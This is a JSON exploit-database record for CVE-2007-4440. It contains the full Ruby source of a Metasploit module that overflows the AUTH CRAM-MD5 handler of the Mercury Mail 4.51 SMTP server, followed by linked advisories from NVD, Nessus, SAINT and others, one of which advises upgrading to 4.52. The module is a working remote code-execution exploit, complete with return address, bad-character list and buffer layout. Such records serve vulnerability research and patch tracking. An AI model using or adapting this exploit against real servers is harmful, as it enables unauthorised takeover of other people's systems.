{"bulletinFamily": "exploit", "id": "EDB-ID:16821", "cvelist": ["CVE-2007-4440"], "modified": "2010-06-22T00:00:00", "lastseen": "2016-02-02T06:35:13", "edition": 1, "sourceData": "##\r\n# $Id: mercury_cram_md5.rb 9583 2010-06-22 19:11:05Z todb $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in Mercury Mail Transport System 4.51.\r\n\t\t\t\tBy sending a specially crafted argument to the AUTH CRAM-MD5 command, an attacker\r\n\t\t\t\tmay be able to execute arbitrary code.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'Version' => '$Revision: 9583 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-4440' ],\r\n\t\t\t\t\t[ 'OSVDB', '39669' ],\r\n\t\t\t\t\t[ 'BID', '25357' ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'thread',\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 600,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x25\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Mercury Mail Transport System 4.51',\t{ 'Ret' => 0x258d0d1e } ], # ter32.dll\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Aug 18 2007'))\r\n\r\n\t\tregister_options([ Opt::RPORT(25) ], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect\r\n\r\n\t\tsock.get_once\r\n\r\n\t\tsock.put(\"EHLO\\r\\n\")\r\n\r\n\t\tsock.get_once\r\n\r\n\t\tsock.put(\"AUTH CRAM-MD5\\r\\n\")\r\n\r\n\t\tsock.get_once\r\n\t\tselect(nil,nil,nil,0.25)\r\n\r\n\t\tbuffer = rand_text_alpha_upper(204) + [target.ret].pack('V')\r\n\t\tbuffer << payload.encoded + rand_text_alpha_upper(1075 - payload.encoded.length)\r\n\r\n\t\tsploit = Rex::Text.encode_base64(buffer)\r\n\r\n\t\tprint_status(\"Trying target #{target.name}...\")\r\n\t\tsock.put(sploit + \"\\r\\n\")\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\nend\r\n", "published": "2010-06-22T00:00:00", "href": "https://www.exploit-db.com/exploits/16821/", "osvdbidlist": ["39669"], "reporter": "metasploit", "hash": "56655b4c9a4736d469c8856ed752f6123843d68af03f898cb6b65547bceea29c", "title": "Mercury Mail SMTP AUTH CRAM-MD5 - Buffer Overflow", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow. CVE-2007-4440. Remote exploit for windows platform", "references": [], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16821/", "enchantments": {"vulnersScore": 5.1}}

{"result": {"cve": [{"id": "CVE-2007-4440", "type": "cve", "title": "CVE-2007-4440", "description": "Stack-based buffer overflow in the MercuryS SMTP server in Mercury Mail Transport System, possibly 4.51 and earlier, allows remote attackers to execute arbitrary code via a long AUTH CRAM-MD5 string. NOTE: this might overlap CVE-2006-5961.", "published": "2007-08-20T20:17:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-4440", "cvelist": ["CVE-2007-4440"], "lastseen": "2017-07-29T11:22:12"}], "packetstorm": [{"id": "PACKETSTORM:82990", "type": "packetstorm", "title": "Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow", "description": "", "published": "2009-11-26T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://packetstormsecurity.com/files/82990/Mercury-Mail-SMTP-AUTH-CRAM-MD5-Buffer-Overflow.html", "cvelist": ["CVE-2007-4440"], "lastseen": "2016-12-05T22:15:53"}], "nessus": [{"id": "MERCURY_SMTP_AUTH_CRAM_MD5_OVERFLOW.NASL", "type": "nessus", "title": "Mercury SMTP Server AUTH CRAM-MD5 Remote Buffer Overflow", "description": "The remote host is running the Mercury Mail Transport System, a free suite of server products for Windows and NetWare associated with Pegasus Mail. \n\nThe version of Mercury Mail installed on the remote host includes an SMTP server that is affected by a buffer overflow flaw. Using a specially crafted 'AUTH CRAM-MD5' request, an unauthenticated, remote attacker can leverage this issue to crash the remote application and even execute arbitrary code remotely, subject to the privileges under which the application runs.", "published": "2007-08-23T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=25928", "cvelist": ["CVE-2007-4440"], "lastseen": "2016-09-26T17:24:01"}], "metasploit": [{"id": "MSF:EXPLOIT/WINDOWS/SMTP/MERCURY_CRAM_MD5", "type": "metasploit", "title": "Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow", "description": "This module exploits a stack buffer overflow in Mercury Mail Transport System 4.51. By sending a specially crafted argument to the AUTH CRAM-MD5 command, an attacker may be able to execute arbitrary code.", "published": "2007-11-07T18:42:19", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.rapid7.com/db/modules/exploit/windows/smtp/mercury_cram_md5", "cvelist": ["CVE-2007-4440"], "lastseen": "2017-07-24T19:21:46"}], "osvdb": [{"id": "OSVDB:39669", "type": "osvdb", "title": "Mercury Mail Transport System SMTP AUTH CRAM-MD5 Remote Overflow", "description": "# No description provided by the source\n\n## References:\nVendor Specific News/Changelog Entry: http://www.pmail.com/m32_451.htm\nSecurity Tracker: 1018587\n[Secunia Advisory ID:26519](https://secuniaresearch.flexerasoftware.com/advisories/26519/)\nOther Advisory URL: http://lists.grok.org.uk/pipermail/full-disclosure/2007-August/065357.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2007-08/0341.html\nISS X-Force ID: 36117\nISS X-Force ID: 36299\nGeneric Exploit URL: http://www.milw0rm.com/exploits/4294\nFrSIRT Advisory: ADV-2007-2918\n[CVE-2007-4440](https://vulners.com/cve/CVE-2007-4440)\nBugtraq ID: 25357\n", "published": "2007-08-18T15:21:28", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:39669", "cvelist": ["CVE-2007-4440"], "lastseen": "2017-04-28T13:20:35"}], "exploitdb": [{"id": "EDB-ID:4294", "type": "exploitdb", "title": "Mercury SMTPD Remote Preauth Stack Based Overrun PoC", "description": "Mercury SMTPD Remote Preauth Stack Based Overrun PoC. CVE-2007-4440. Dos exploit for windows platform", "published": "2007-08-18T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/4294/", "cvelist": ["CVE-2007-4440"], "lastseen": "2016-01-31T20:34:57"}], "saint": [{"id": "SAINT:22E7286F9783F05DBFC7B5B9CDBD5350", "type": "saint", "title": "Mercury Mail SMTP AUTH CRAM-MD5 buffer overflow", "description": "Added: 10/05/2007 \nCVE: [CVE-2007-4440](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4440>) \nBID: [25357](<http://www.securityfocus.com/bid/25357>) \nOSVDB: [39669](<http://www.osvdb.org/39669>) \n\n\n### Background\n\n[Mercury Mail Transport System](<http://www.pmail.com/overviews/ovw_mercury.htm>) is an e-mail server product for Windows and NetWare. \n\n### Problem\n\nA buffer overflow vulnerability in the SMTP service allows remote attackers to execute arbitrary commands by sending a specially crafted argument to the `**AUTH CRAM-MD5**` command. \n\n### Resolution\n\n[Upgrade](<http://www.pmail.com/downloads.htm>) to Mercury Mail Transport System version 4.52 or higher. \n\n### References\n\n<http://secunia.com/advisories/26519> \n<http://archives.neohapsis.com/archives/fulldisclosure/2007-08/0341.html> \n\n\n### Limitations\n\nExploit works on Mercury Mail Transport System 4.51. \n\n### Platforms\n\nWindows \n \n\n", "published": "2007-10-05T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/mercury_smtp_crammd5", "cvelist": ["CVE-2007-4440"], "lastseen": "2016-12-14T16:58:06"}, {"id": "SAINT:491FF49E4743FD3140AD54B41D5EBB5F", "type": "saint", "title": "Mercury Mail SMTP AUTH CRAM-MD5 buffer overflow", "description": "Added: 10/05/2007 \nCVE: [CVE-2007-4440](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4440>) \nBID: [25357](<http://www.securityfocus.com/bid/25357>) \nOSVDB: [39669](<http://www.osvdb.org/39669>) \n\n\n### Background\n\n[Mercury Mail Transport System](<http://www.pmail.com/overviews/ovw_mercury.htm>) is an e-mail server product for Windows and NetWare. \n\n### Problem\n\nA buffer overflow vulnerability in the SMTP service allows remote attackers to execute arbitrary commands by sending a specially crafted argument to the `**AUTH CRAM-MD5**` command. \n\n### Resolution\n\n[Upgrade](<http://www.pmail.com/downloads.htm>) to Mercury Mail Transport System version 4.52 or higher. \n\n### References\n\n<http://secunia.com/advisories/26519> \n<http://archives.neohapsis.com/archives/fulldisclosure/2007-08/0341.html> \n\n\n### Limitations\n\nExploit works on Mercury Mail Transport System 4.51. \n\n### Platforms\n\nWindows \n \n\n", "published": "2007-10-05T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/mercury_smtp_crammd5", "cvelist": ["CVE-2007-4440"], "lastseen": "2016-10-03T15:01:59"}, {"id": "SAINT:132528EF0A0ABE0820C9BC93319E35C0", "type": "saint", "title": "Mercury Mail SMTP AUTH CRAM-MD5 buffer overflow", "description": "Added: 10/05/2007 \nCVE: [CVE-2007-4440](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4440>) \nBID: [25357](<http://www.securityfocus.com/bid/25357>) \nOSVDB: [39669](<http://www.osvdb.org/39669>) \n\n\n### Background\n\n[Mercury Mail Transport System](<http://www.pmail.com/overviews/ovw_mercury.htm>) is an e-mail server product for Windows and NetWare. \n\n### Problem\n\nA buffer overflow vulnerability in the SMTP service allows remote attackers to execute arbitrary commands by sending a specially crafted argument to the `**AUTH CRAM-MD5**` command. \n\n### Resolution\n\n[Upgrade](<http://www.pmail.com/downloads.htm>) to Mercury Mail Transport System version 4.52 or higher. \n\n### References\n\n<http://secunia.com/advisories/26519> \n<http://archives.neohapsis.com/archives/fulldisclosure/2007-08/0341.html> \n\n\n### Limitations\n\nExploit works on Mercury Mail Transport System 4.51. \n\n### Platforms\n\nWindows \n \n\n", "published": "2007-10-05T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/mercury_smtp_crammd5", "cvelist": ["CVE-2007-4440"], "lastseen": "2017-01-10T14:03:43"}], "seebug": [{"id": "SSV-71323", "type": "seebug", "title": "Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow", "description": "Summary: \nThe Mercury Mail Transport System is a comprehensive Internet Mail Server system.< br/>the Mercury Mail Transport System Mercury/32 SMTP server module(mercurys.dll)did not correctly handle long AUTH CRAM-MD5 string, a remote attacker could use this vulnerability to control the server.< br/>If the user submit to the server a malicious authentication request, then it could trigger a stack overflow, resulting in Complete invasion of the server system.\n", "published": "2014-07-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.seebug.org/vuldb/ssvid-71323", "cvelist": ["CVE-2007-4440"], "lastseen": "2016-07-29T06:40:52"}]}}